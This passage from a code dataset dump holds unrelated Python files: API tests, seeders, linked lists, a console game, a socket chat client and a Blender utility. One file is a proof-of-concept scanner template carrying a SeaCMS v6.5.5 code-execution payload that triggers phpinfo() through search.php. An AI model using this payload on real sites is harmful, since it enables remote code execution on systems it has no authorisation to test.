self.client.get(f\"/staff/list?{query}\", headers={})\n assert response.status_code == HTTP_200_OK\n staff_list = response.json()\n assert isinstance(staff_list, list)\n assert len(staff_list) > 0\n\n def test_5_delete_staff(self, monkeypatch):\n response = self.client.post(\"/staff/create\", headers={}, json=self.staff_example)\n assert response.status_code == HTTP_201_CREATED\n staff = response.json()\n response = self.client.delete(\"/staff/delete/{}\".format(staff[\"_id\"]), headers={})\n assert response.status_code == HTTP_204_NO_CONTENT\n response = self.client.get(\"/staff/get/{}\".format(staff[\"_id\"]), headers={})\n assert response.status_code == HTTP_404_NOT_FOUND\n","sub_path":"staffing/app/staff/tests/system/test_routers.py","file_name":"test_routers.py","file_ext":"py","file_size_in_byte":4448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"247997738","text":"from orator.seeds import 
Seeder\n\n\nclass BibliotecaTableSeeder(Seeder):\n\n def run(self):\n \"\"\"\n Run the database seeds.\n \"\"\"\n self.db.table('Biblioteca').insert({\n 'Nombre_Biblioteca': 'Biblioteca Nacional del Peru',\n 'Direccion': 'Av. De la Poesía 160, San Borja'\n })\n self.db.table('Biblioteca').insert({\n 'Nombre_Biblioteca': 'Gran Biblioteca Pública de Lima',\n 'Direccion': 'Av. Abancay 4ta. Cdra. s/n Lima 01'\n })\n","sub_path":"Semana8Hackaton/Bryan Arias/App/seeds/Biblioteca_table_seeder.py","file_name":"Biblioteca_table_seeder.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"232859463","text":"#!/usr/bin/env python3.7\r\n# -*- coding: utf-8 -*-\r\n#\r\n# LList.py\r\n# \r\n# Copyright 2019 phbrown \r\n# \r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n# \r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n# \r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\r\n# MA 02110-1301, USA.\r\n# \r\n# \r\n\r\nfrom typing import Any, cast, List, Optional\r\n\r\nclass LList(object):\r\n \"\"\"Implements a linked list with a sentinel node indicating an empty\r\n list. The sentinel node has both data and next equal to None. No\r\n methods are provided to get or set the internal attributes of a\r\n list node directly, so as to discourage mucking about with the list\r\n without using the ADT methods.\"\"\"\r\n\r\n def _invariant(self) -> bool:\r\n \"\"\"Class invariant. 
This actually checks the entire list.\"\"\"\r\n valid = False\r\n if (self._next != None): # Normal node, check the next one\r\n # (We already know self._next != None, so the cast will work.)\r\n valid = cast(LList, self._next)._invariant()\r\n elif (self._next == None and self._data == None): # Sentinel\r\n valid = True\r\n return valid\r\n \r\n def __init__(self) -> None:\r\n \"\"\"Create an empty list node.\"\"\"\r\n self._data:Any = None\r\n self._next:Optional[LList] = None\r\n # Post\r\n assert self._invariant()\r\n \r\n # Query methods\r\n \r\n def isEmpty(self) -> bool:\r\n \"\"\"Returns True if the list is empty, False otherwise.\"\"\"\r\n # True if this is the sentinel node\r\n return self._data == None and self._next == None \r\n \r\n def size(self) -> int:\r\n \"\"\"Returns the number of items on the list.\"\"\"\r\n if self.isEmpty(): # No nodes, just return 0\r\n return 0\r\n else: # return 1 for this node, plus the size of the rest of the list\r\n # (We already know there *is* more list, so the cast will work.)\r\n return 1 + cast(LList, self._next).size()\r\n\r\n def search(self, value:Any) -> bool:\r\n \"\"\"Searches the list for value VALUE and returns a Boolean\r\n indicating that VALUE is present in the list (True) or not\r\n present in the list (False).\"\"\"\r\n if self.isEmpty(): # Empty list contains nothing\r\n return False\r\n elif self._data == value: \r\n # If this node has the right contents, return True\r\n return True\r\n else:\r\n # Otherwise, ask the rest of the list\r\n # (We already know there *is* more list, so the cast will work.)\r\n return cast(LList, self._next).search(value)\r\n\r\n def __str__(self) -> str:\r\n \"\"\"Returns a string representation of the list. This is very loosely\r\n based on the box diagram. Contents of a node are shown within\r\n ❬❭, with a ➞ to the next node. The empty list (sentinel node)\r\n is represented by ∅. So a list containing the strings \"Huey\",\r\n \"Dewey\", and \"Louie\", in that order, would be represented by\r\n the string \"❬Huey❭➞❬Dewey❭➞❬Louie❭➞∅\".\"\"\"\r\n if self.isEmpty(): # Show the sentinel node\r\n return \"\\u2205\" # \"∅\"\r\n else: # Show this node, and concatenate on the rest of the list\r\n # \r\n return \"\\u276c{}\\u276d\\u279e\".format(self._data) + \\\r\n str(cast(LList, self._next))\r\n \r\n def shallowCopy(self) -> 'LList':\r\n \"\"\"Returns a shallow copy of the list, only copying pointers.\"\"\"\r\n return self\r\n\r\n def deepCopy(self) -> 'LList':\r\n \"\"\"Returns a deep(er) copy of the list, copying data. Assumes all the\r\n data objects are immutable. 
(Unhappily, that's not easy to test.)\"\"\"\r\n newList:LList = LList() # if self is empty, this is the right value\r\n if not self.isEmpty():\r\n # Cast is safe because we already know self._next != None\r\n newList = cast(LList, self._next).deepCopy()\r\n newList.add(self._data)\r\n\r\n # Post:\r\n assert newList._invariant() and newList._data == self._data\r\n return newList\r\n\r\n\r\n # Mutator methods\r\n \r\n def add(self, value:Any) -> None:\r\n \"\"\"Adds a new node containing VALUE to the head of the list.\"\"\"\r\n newNode = LList() # Empty node\r\n \r\n # Copy the contents of the current head to the new node\r\n newNode._next = self._next\r\n newNode._data = self._data\r\n\r\n # Link to the new node (effectively, to the old head)\r\n self._next = newNode\r\n # Put the new data in the head node (now the new head)\r\n self._data = value\r\n # Post:\r\n assert self._invariant()\r\n \r\n def pop(self, pos:int = -1) -> Any:\r\n \"\"\"Pops the item at position POS off the list, \r\n and returns it.\"\"\"\r\n # Pre:\r\n assert (not (self.isEmpty())) # Can't pop from an empty list\r\n size = self.size() \r\n assert -size <= pos < size # Make sure POS argument is valid\r\n\r\n # Handle negative indexes in POS\r\n if pos < 0:\r\n pos = pos + size\r\n assert pos >= 0\r\n \r\n result = None # Make sure there *is* a result available to return\r\n if pos == 0: # Pop this node\r\n result = self._data # Data to return\r\n \r\n # (We know the list isn't empty, so there *is* a node there.)\r\n nextNode:LList = cast(LList, self._next)\r\n \r\n # Copy the next node's contents into this node.\r\n # The effect is to link around the next node.\r\n self._data = nextNode._data\r\n self._next = nextNode._next\r\n else: # pos > 0, so we count down pos until pos == 0\r\n # Popping position POS from here is the same as popping position\r\n # POS - 1 from the rest of the list\r\n # (We already know there *is* more list, so the cast will work.)\r\n result = cast(LList, self._next).pop(pos - 1)\r\n \r\n # Post:\r\n assert self._invariant()\r\n return result\r\n \r\n\r\ndef main(args:List[str]) -> int:\r\n return 0\r\n\r\nif __name__ == '__main__':\r\n import sys\r\n sys.exit(main(sys.argv))\r\n","sub_path":"LList.py","file_name":"LList.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"55993056","text":"import random, time, msvcrt\r\nfrom enum import Enum\r\nWAIT_SECONDS = 1 / 5\r\nFIELD_WIDTH = 20\r\nFIELD_HEIGHT = 20\r\nBOAT_CHARACTER = \"》\"\r\nBLANK_CHARACTER = \" \"\r\nscore = 0\r\n\r\nclass INKB(Enum):\r\n UP = 1\r\n DOWN = 2\r\n LEFT = 3\r\n RIGHT = 4\r\n SHOT = 5\r\n NONE = 6\r\n\r\nclass Ship:\r\n\r\n def __init__(self, character, x, y):\r\n self.character = character\r\n self.x = x\r\n self.y = y\r\n \r\n def move(self, x, y):\r\n self.x += x\r\n self.y += y\r\n\r\n if self.x < 0:\r\n self.x = 0\r\n elif self.x >= FIELD_WIDTH:\r\n self.x = FIELD_WIDTH - 1\r\n \r\n if self.y < 0:\r\n self.y = 0\r\n elif self.y >= FIELD_HEIGHT:\r\n self.y = FIELD_HEIGHT - 1\r\n \r\n def setPosition(self, x, y):\r\n self.x = x\r\n self.y = y\r\n \r\n def overlap(self, x, y):\r\n return self.x == x and self.y == y\r\n\r\n\r\n\r\ndef initTile(width, height):\r\n tile = []\r\n for y in range(height):\r\n row = [False] * width\r\n tile.append(row)\r\n return tile\r\n\r\ndef initBoats(length):\r\n boats = []\r\n for i in range(length):\r\n boats.append(Ship(\"》\", 0, 0))\r\n return boats\r\n\r\ndef getINKB():\r\n if 
msvcrt.kbhit():\r\n key0 = str(msvcrt.getch())\r\n if key0 == \"b'\\\\xe0'\":\r\n key1 = str(msvcrt.getch())\r\n if key1 == \"b'H'\":\r\n return INKB.UP\r\n elif key1 == \"b'P'\":\r\n return INKB.DOWN\r\n elif key1 == \"b'K'\":\r\n return INKB.LEFT\r\n elif key1 == \"b'M'\":\r\n return INKB.RIGHT\r\n else:\r\n return INKB.NONE\r\n elif key0 == \"b'z'\":\r\n return INKB.SHOT\r\n else:\r\n return INKB.NONE\r\n else:\r\n return INKB.NONE\r\n\r\ndef tickMyShip(myShip, boats, tile, inkb):\r\n if inkb == INKB.UP:\r\n myShip.move(0, -1)\r\n elif inkb == INKB.DOWN:\r\n myShip.move(0, 1)\r\n elif inkb == INKB.LEFT:\r\n myShip.move(-1, 0)\r\n elif inkb == INKB.RIGHT:\r\n myShip.move(1, 0)\r\n elif inkb == INKB.SHOT and boats[0].x >= FIELD_WIDTH - 1:\r\n boats[0].setPosition(myShip.x, myShip.y)\r\n boats = boats[1:] + boats[:1]\r\n \r\n for boat in boats:\r\n if boat.x < FIELD_WIDTH - 2:\r\n if tile[boat.y][boat.x] == True:\r\n #score += 1\r\n tile[boat.y][boat.x] = False\r\n boat.move(FIELD_WIDTH, 0)\r\n elif tile[boat.y][boat.x - 1] == True:\r\n #score += 1\r\n tile[boat.y][boat.x - 1] = False\r\n boat.move(FIELD_WIDTH, 0)\r\n if boat.x <= FIELD_WIDTH:\r\n boat.move(1, 0)\r\n return boats, tile\r\n\r\ndef tickTile(tile):\r\n for y in range(FIELD_HEIGHT):\r\n row = tile[y]\r\n row = row[1:]\r\n row.append(random.randint(0, 4) == 0)\r\n tile[y] = row\r\n\r\ndef overlapBoats(boats, x, y):\r\n for boat in boats:\r\n if boat.x == x and boat.y == y:\r\n return True\r\n return False\r\n\r\ndef getTextTile(myShip, boats, tile):\r\n text = \"\"\r\n for y in range(FIELD_HEIGHT):\r\n for x in range(FIELD_WIDTH - 1):\r\n if myShip.overlap(x, y):\r\n text += myShip.character\r\n elif overlapBoats(boats, x, y):\r\n text += BOAT_CHARACTER\r\n elif tile[y][x] == True:\r\n text += \"■\"\r\n else:\r\n text += BLANK_CHARACTER\r\n text += \"\\n\"\r\n text += \"■\" * FIELD_WIDTH\r\n return text\r\n\r\ntick = 0\r\ntile = initTile(FIELD_WIDTH, FIELD_HEIGHT)\r\nmyShip = Ship(\">\", 0, 0)\r\nboats = initBoats(20)\r\nshowText = getTextTile(myShip, boats, tile)\r\nprint(showText)\r\nwhile True:\r\n inkb = getINKB()\r\n boats, tile = tickMyShip(myShip, boats, tile, inkb)\r\n if tick >= 1:\r\n tick -= 1\r\n tickTile(tile)\r\n text = getTextTile(myShip, boats, tile)\r\n if text != showText:\r\n showText = text\r\n print(showText)\r\n tick += WAIT_SECONDS\r\n time.sleep(WAIT_SECONDS)\r\n","sub_path":"shot.py","file_name":"shot.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"106626849","text":"class Node:\r\n\r\n def __init__(self,data = None):\r\n self.data = data\r\n self.refNext = None\r\n\r\n\r\nclass Linked_list:\r\n def __init__(self):\r\n self.head = None\r\n\r\n\r\n def reverse(self):\r\n previous = None\r\n presentNode = self.head\r\n nextval = presentNode.refNext\r\n while nextval != None:\r\n presentNode.refNext = previous\r\n previous = presentNode\r\n presentNode = nextval\r\n nextval = nextval.refNext\r\n\r\n presentNode.refNext = previous\r\n self.head = presentNode\r\n\r\n def traverse(self):\r\n\r\n presentNode = self.head\r\n while presentNode:\r\n print(\"DATA VALUE = \",presentNode.data)\r\n presentNode = presentNode.refNext\r\n\r\n\r\n\r\n#EXECUTION \r\nobjNode1 = Node(1)\r\nobjNode2 = Node(2)\r\nobjNode3 = Node(3)\r\nobjNode4 = Node(4)\r\nlinkObj = Linked_list()\r\n#head of the linked list to first object\r\nlinkObj.head = objNode1\r\n# reference of the first node object to second 
object\r\nlinkObj.head.refNext = objNode2\r\nobjNode2.refNext = objNode3\r\nobjNode3.refNext = objNode4\r\nprint(\"traverse before reversing\")\r\nlinkObj.traverse()\r\nlinkObj.reverse()\r\nprint(\"traverse after reversing\")\r\nlinkObj.traverse()\r\n","sub_path":"Chapter 11/Reversing_a_linked_list4_2_7.py","file_name":"Reversing_a_linked_list4_2_7.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"615954770","text":"from bson import ObjectId\n\nfrom yadm import fields\nfrom yadm.documents import Document, EmbeddedDocument\n\nfrom .test_database import BaseDatabaseTest\n\n\nclass EmbeddedDocumentFieldTest(BaseDatabaseTest):\n def setUp(self):\n super().setUp()\n\n class ETestDoc(EmbeddedDocument):\n i = fields.IntegerField()\n\n class TestDoc(Document):\n __collection__ = 'testdoc'\n e = fields.EmbeddedDocumentField(ETestDoc)\n\n self.ETestDoc = ETestDoc\n self.TestDoc = TestDoc\n\n def test_default(self):\n td = self.TestDoc()\n self.assertFalse(hasattr(td, 'e'))\n\n def test_get(self):\n _id = self.db.db.testdoc.insert({'e': {'i': 13}})\n td = self.db.get_queryset(self.TestDoc).with_id(_id)\n\n self.assertTrue(hasattr(td, 'e'))\n self.assertIsInstance(td.e, self.ETestDoc)\n self.assertTrue(hasattr(td.e, 'i'))\n self.assertIsInstance(td.e.i, int)\n self.assertEqual(td.e.i, 13)\n\n def test_set(self):\n td = self.TestDoc()\n td.e = self.ETestDoc()\n\n self.assertTrue(hasattr(td, 'e'))\n self.assertIsInstance(td.e, self.ETestDoc)\n self.assertFalse(hasattr(td.e, 'i'))\n\n td.e.i = 13\n self.assertTrue(hasattr(td.e, 'i'))\n self.assertIsInstance(td.e.i, int)\n self.assertEqual(td.e.i, 13)\n\n def test_set_typeerror(self):\n class FailETestDoc(EmbeddedDocument):\n s = fields.StringField\n\n td = self.TestDoc()\n self.assertRaises(TypeError, setattr, td, 'e', FailETestDoc())\n\n def test_set_insert(self):\n td = self.TestDoc()\n td.e = self.ETestDoc()\n td.e.i = 13\n self.db.insert(td)\n\n data = self.db.db.testdoc.find_one({'_id': td.id})\n self.assertEqual(data, {'_id': td.id, 'e': {'i': 13}})\n\n def test_set_save(self):\n _id = self.db.db.testdoc.insert({'e': {'i': 13}})\n td = self.db.get_queryset(self.TestDoc).with_id(_id)\n\n td.e.i = 26\n # td.__fields_changed__.add('e.i')\n self.db.save(td)\n\n data = self.db.db.testdoc.find_one({'_id': _id})\n self.assertEqual(data, {'_id': _id, 'e': {'i': 26}})\n\n\nclass EmbeddedDocumentWithIdFieldTest(BaseDatabaseTest):\n def setUp(self):\n super().setUp()\n\n class ETestDoc(EmbeddedDocument):\n id = fields.ObjectIdField(default_gen=True)\n i = fields.IntegerField()\n\n class TestDoc(Document):\n __collection__ = 'testdoc'\n e = fields.EmbeddedDocumentField(ETestDoc)\n\n self.ETestDoc = ETestDoc\n self.TestDoc = TestDoc\n\n def test_load_default(self):\n td = self.TestDoc({'e': {'i': 13}})\n self.assertTrue(hasattr(td, 'e'))\n self.assertTrue(hasattr(td.e, 'i'))\n self.assertTrue(hasattr(td.e, 'id'))\n self.assertEqual(td.e.i, 13)\n self.assertIsInstance(td.e.id, ObjectId)\n","sub_path":"tests/test_fields_embedded.py","file_name":"test_fields_embedded.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"534201626","text":"list = ['京急線','遅延','お客様トラブル','JR','運転見合わせ','雪','相鉄','運休','ストライキ決行']\nnum = int(len(list))\nprint ('要素数は', num)\n\n#欲しい情報は6個までとする\n\n# if 6 <= num:\n# del list [6 : num]\n\nnum = int (len(list))\nprint ('要素数は', num)\nprint 
('##########################')\n\nlist2 = []\nlist3 = []\nlist4 = []\nx = int(0)\nwhile x < num:\n # print(list[x])\n list2.append(list[x])\n print(list2)\n x += 3\n\nx= int(1)\nwhile x < num:\n # print(list[x])\n list3.append(list[x])\n print(list3)\n x += 3\n\nx = int(2)\nwhile x < num:\n # print(list[x])\n list4.append(list[x])\n print(list4)\n x += 3\n\nprint('###########################')\n\nprint(list2)\nprint(list3)\nprint(list4)\n","sub_path":"program/python/train/sp/arrayTest.py","file_name":"arrayTest.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"160076239","text":"import socket\nimport sys\nimport select\n\n# from javax.swing import JFrame\nclass SocketClientTest:\n ServerIP = \"127.0.0.1\"\n ServerPort = 1103\n test = '123'\n addressFamily = (ServerIP, ServerPort)\n\n def __init__(self):\n self.messageString = ''\n self.clientName = \"\"\n self.serverMessage = \"\"\n self.channelName = \"\"\n self.messageInput = \"\"\n self.clientSock = socket.socket()\n self.command=\"\"\n\n \"\"\"\n def showTK(self):\n self.chatFrame = tk.Frame(self.top, bg='white')\n self.chatFrame.pack()\n self.chatTextBox = tk.Entry(self.top)\n self.chatTextBox.pack(side=\"top\")\n self.chatTArea = tk.Text(self.top)\n self.chatTArea.pack(side=\"bottom\")\n self.chatButton = tk.Button(self.top, text=\"Send\", command=self.sendToServer)\n self.chatButton.pack(side=\"right\")\n self.top.mainloop()\n \"\"\"\n\n def sendtoserver(self, soc,sock_list):\n print(\"Test\")\n # self.messageInput=\tself.chatTextBox.get()\n\n\n\n # self.fHandle.write(channelName.join(\":\".join(self.messageInput)))\n #soc.send(self.channelName.join(\":\".join(self.messageInput)))\n #self.chatTextBox.delete(0, len(self.messageInput))\n\n def socketrun(self):\n self.clientSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.clientSock.connect(self.addressFamily)\n soc=self.clientSock\n socket_list=[sys.stdin,soc]\n print(\"Connected to server\")\n while True:\n r_list, w_list, err_list = select.select(socket_list, [], [])\n for socket_obj in r_list:\n\n if socket_obj == soc:\n #print(\"Server sent a msg\")\n\n self.serverMessage = soc.recv(1024).decode('UTF-8').strip()\n if self.serverMessage:\n #print(\"SERVER MESSAGE\", self.serverMessage)\n if self.serverMessage.startswith(\"PROVIDEANAME\"):\n sys.stdout.write('Register with a user name: \\n')\n\n elif self.serverMessage.startswith(\"LIST\"):\n sys.stdout.write(\"List of available groups %s\\n\" % self.serverMessage.split(\" \",1)[1][0:])\n # soc.send(bytes(self.channelName,'UTF-8'))\n elif self.serverMessage.startswith(\"MESSAGE\"):\n message =self.serverMessage.split(\":\", 1)[1][0:]\n sys.stdout.write(message)\n elif self.serverMessage.startswith(\"from\"):\n sys.stdout.write(self.serverMessage+\"\\n\")\n\n elif self.serverMessage.startswith(\"Bye\"):\n sys.stdout.write(self.serverMessage)\n sys.exit(1)\n else:\n print(\"SERVER's MESSAGE\", self.serverMessage)\n sys.stdout.write('>>>')\n\n \"\"\"\n elif self.serverMessage.startswith(\"SENDCOMMANDS\"):\n #print(self.serverMessage.split(\" \")[2:])\n self.command=sys.stdin.readline()\n soc.send(bytes(self.command,'UTF-8'))\n \"\"\"\n\n # soc.send(bytes(message,'UTF-8'))\n else:\n print(\"Server is down\")\n socket_obj.close()\n sys.exit(1)\n\n\n else:\n #print(\"Waiting for a command\")\n cmd = socket_obj.readline()\n soc.send(bytes(cmd, 'UTF-8'))\n sys.stdout.flush()\n\n\n\ns = 
SocketClientTest()\nprint(s.test)\ns.socketrun()\n","sub_path":"IRC/Client_new.py","file_name":"Client_new.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"478156442","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nname: 漏洞名称(禁止换行)控制在30字以内\nreferer: 漏洞地址(禁止换行)未知请填unknown\nauthor: 作者名\ndescription: 漏洞描述 \n'''\nimport sys\nimport requests\nimport warnings\ndef run(url):\n #此处编辑检测代码\n #示例代码,请更改result内容,result[0]为漏洞名称,result[1]为返回的内容,result[2]为测试结果\n result = ['seacms v6.5.5代码执行漏洞','','']\n headers = {\n \"User-Agent\":\"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50\"\n }\n payload = \"searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*\"\n url_path = url + \"/search.php?phpinfo();\"\n try:\n data = requests.get(url_path, timeout=3,headers=headers, verify=False)\n if data.status_code == 200 and 'phpinfo' in data.text:\n result[2]= \"存在\"\n result[1] = \"URL:%s\\nPOST:%s\"%(url_path,payload)\n else:\n result[2] = \"不存在\"\n except Exception as e:\n # print (e)\n result[2] =\"不存在\"\n #这里可设置未知,连接超时等,只有不存在不会显示到结果中。\n return result\n #最后一定要返回一个带有3个参数的列表。不然会出错误。\n\nif __name__ == \"__main__\":\n #此处不会调用\n warnings.filterwarnings(\"ignore\")\n testVuln = run(\"http://baidu.com\")\n print(testVuln)","sub_path":"POC模板.py","file_name":"POC模板.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"309680183","text":"# In each loop, we first check what has the smaller x-coordinate: adding the next building from the input,\n# or removing the next building from the queue. In case of a tie, adding buildings wins, as that guarantees correctness (think about it :-).\n# We then either add all input buildings starting at that x-coordinate or we remove all queued buildings ending at that x-coordinate or earlier\n# (remember we keep buildings in the queue as long as they're \"under the roof\" of a larger actually alive building). 
And then, ' \\\n# 'if the current maximum height in the queue differs from the last in the skyline, ' \\\n# 'we add it to the skyline.\n\nfrom heapq import *\n\n\nclass Solution:\n def getSkyline(self, LRH):\n skyline = []\n i, n = 0, len(LRH)\n liveHR = []\n while i < n or liveHR:\n if not liveHR or i < n and LRH[i][0] <= -liveHR[0][1]: # adding the next building from the input\n x = LRH[i][0]\n while i < n and LRH[i][0] == x:\n heappush(liveHR, (-LRH[i][2], -LRH[i][1])) # using '-' because heapq is min heap ,change it to max heap\n i += 1\n else: # removing the next building from the queue\n x = -liveHR[0][1]\n while liveHR and -liveHR[0][1] <= x:\n heappop(liveHR)\n\n height = len(liveHR) and -liveHR[0][0] # return max height in heapq if heapq not empty otherwise return 0\n print(i,height)\n if not skyline or height != skyline[-1][1]:\n skyline += [x, height],\n return skyline\n\n\nsol = Solution()\nlrh = [[2, 9, 10], [3, 7, 15], [5, 12, 12], [15, 20, 10], [19, 24, 8]]\nprint(sol.getSkyline(lrh))\n","sub_path":"218.py","file_name":"218.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"348731698","text":"import bpy\nimport bmesh\nimport mathutils\nfrom .utils import *\n\ndef get_bounds(obj):\n return BoundingBox(obj)\n\ndef shift_verts(obj, move_amt):\n me = obj.data\n if me.is_editmode:\n bm = bmesh.from_edit_mesh(me)\n else:\n bm = bmesh.new()\n bm.from_mesh(me)\n for v in bm.verts:\n v.co += move_amt\n if bm.is_wrapped:\n bmesh.update_edit_mesh(me, False, False)\n else:\n bm.to_mesh(me)\n me.update()\n\ndef set_origin(obj, origin):\n loc, rot, scale = obj.matrix_local.decompose()\n offset = origin - loc\n offset = mathutils.Vector([offset[0] / scale[0], offset[1] / scale[1], offset[2] / scale[2]])\n me = obj.data\n if me.is_editmode:\n bm = bmesh.from_edit_mesh(me)\n else:\n bm = bmesh.new()\n bm.from_mesh(me)\n for v in bm.verts:\n v.co -= offset\n if bm.is_wrapped:\n bmesh.update_edit_mesh(me, False, False)\n else:\n bm.to_mesh(me)\n me.update()\n obj.matrix_local.translation = origin\n\n\nclass BoundingBoxBase:\n def get_dimensions(self):\n return mathutils.Vector(self.box_max) - mathutils.Vector(self.box_min)\n \n def set_from_object(self, obj):\n coords = [coord[:] for coord in obj.bound_box]\n axis_values = zip(*coords)\n min_vec, max_vec = {}, {}\n for i, values in enumerate(axis_values):\n min_vec[i] = min(values)\n max_vec[i] = max(values)\n self.box_min[i] = min(values)\n self.box_max[i] = max(values)\n \n def get_bottomfrontleft(self): return mathutils.Vector(self.box_min)\n def get_bottombackleft(self): return mathutils.Vector([self.box_min[0], self.box_max[1], self.box_min[2]])\n def get_topbackright(self): return mathutils.Vector(self.box_max)\n\n def copy(bounds):\n self.box_min = bounds.box_min\n self.box_max = bounds.box_max\n \n def get_topleft(self):\n return self.topleft\n\nclass BoundingBox(BoundingBoxBase):\n def __init__(self, obj):\n self.box_min = mathutils.Vector([0, 0, 0])\n self.box_max = mathutils.Vector([0, 0, 0])\n self.set_from_object(obj) \n\n\nclass BpyBoundingBox(bpy.types.PropertyGroup, BoundingBoxBase):\n def copy_into(self, other_bb):\n other_bb.box_min = self.box_min\n other_bb.box_max = self.box_max\n\n box_min : bpy.props.FloatVectorProperty(size=3, default=[0, 0, 0])\n box_max : bpy.props.FloatVectorProperty(size=3, default=[0, 0, 0])\n\ndef set_mesh_preserve_origin(obj, bm):\n original_bb = BoundingBox(obj)\n obj_size = 
original_bb.get_dimensions()\n if obj_size[0] == 0 or obj_size[1] == 0:\n tl = mathutils.Vector([0,0,0])\n else:\n tl = original_bb.get_bottombackleft()\n tl = mathutils.Vector([tl[0] / obj_size[0], tl[1] / obj_size[1], 0])\n apply_bmesh_to_object(obj, bm)\n new_bb = BoundingBox(obj)\n new_size = new_bb.get_dimensions()\n if new_size[0] == 0 or new_size[1] == 0:\n new_tl = mathutils.Vector([0,0,0])\n else:\n new_tl = new_bb.get_bottombackleft()\n new_tl = mathutils.Vector([new_tl[0] / new_size[0], new_tl[1] / new_size[1], 0])\n vert_move_amt = multiply_vec3((tl - new_tl), new_size)\n shift_verts(obj, vert_move_amt)","sub_path":"ObjUtils.py","file_name":"ObjUtils.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"110955650","text":"# python-holidays\n# ---------------\n# A fast, efficient Python library for generating country, province and state\n# specific sets of holidays on the fly. It aims to make determining whether a\n# specific date is a holiday as fast and flexible as possible.\n#\n# Authors: dr-prodigy (c) 2017-2023\n# ryanss (c) 2014-2017\n# Website: https://github.com/dr-prodigy/python-holidays\n# License: MIT (see LICENSE file)\n\nimport re\nfrom unittest import TestCase\n\nfrom holidays import country_holidays, list_supported_countries\n\n\nclass TestReadme(TestCase):\n @classmethod\n def setUpClass(cls):\n with open(\"README.rst\", encoding=\"utf-8\") as readme_file:\n cls.readme_content = \"\".join(readme_file.readlines())\n\n super().setUpClass()\n\n def test_supported_countries_count(self):\n actual_country_count = len(list_supported_countries(unique=True))\n readme_country_count = int(\n re.findall(\n r\"We currently support (\\d+) country codes.\",\n self.readme_content,\n )[0]\n )\n self.assertEqual(\n readme_country_count,\n actual_country_count,\n \"README.rst supported countries statement is out of date: \"\n f\"'We currently support {readme_country_count} countries'. 
\"\n f\"Actual supported countries count: {actual_country_count}\",\n )\n\n def test_supported_countries_table(self):\n # Parse table data.\n table_content = [\n line.strip()\n for line in re.findall(\n r\"Subdivisions Available(.*)Available Financial Markets\",\n self.readme_content,\n re.DOTALL,\n )[0].split(\"\\n\")\n if line\n ]\n country_names = []\n country_alpha_2_codes = set()\n country_subdivisions = {}\n subdivisions_re = re.compile(\".*: (.*)\")\n for idx in range(0, len(table_content), 3): # 3 column table.\n # 1st column.\n name = table_content[idx].strip(\" *-\").replace(\" \", \"\").lower()\n country_names.append(name)\n\n # 2nd column.\n alpha_2_code = table_content[idx + 1].strip(\" -\")\n if alpha_2_code:\n country_alpha_2_codes.add(alpha_2_code)\n\n # 3rd column.\n country_subdivisions[alpha_2_code] = []\n subdivisions = table_content[idx + 2].split(\".\")\n for subdivision in subdivisions:\n subdivision_group = subdivision.split(\";\")[0].strip(\" -\")\n # Exclude empty subdivisions.\n if subdivision_group.startswith(\"None\") or alpha_2_code == \"\":\n country_subdivisions[alpha_2_code] = []\n continue\n\n # Combine all subdivision codes.\n country_subdivisions[alpha_2_code].extend(\n [\n subdivision_code.replace(\"(default)\", \"\").strip(\"* \")\n for subdivision_code in subdivisions_re.findall(\n subdivision_group\n )[0].split(\",\")\n ]\n )\n\n # Check data.\n self.assertEqual(\n country_names,\n sorted(country_names),\n \"The supported countries table must be sorted alphabetically by \"\n \"country name.\\n\"\n + \"\\n\".join(\n (\n f\"{c} != {s}\"\n for c, s in zip(country_names, sorted(country_names))\n if c != s\n )\n ),\n )\n\n country_names = set(c.split(\"(the)\")[0] for c in country_names)\n supported_countries = list_supported_countries(unique=True)\n for country_alpha_2_code in supported_countries:\n country = country_holidays(country_alpha_2_code)\n country_name = country.__class__.__base__.__name__\n\n # Make sure country name is shown correctly.\n if country_name.startswith(\"Holiday\"):\n self.assertIn(\n country_name[8:],\n country_alpha_2_codes,\n f\"Country class '{country_name}' is not shown correctly \"\n \"in the table.\",\n )\n else:\n self.assertIn(\n country_name.lower().replace(\n \"unitedstates\", 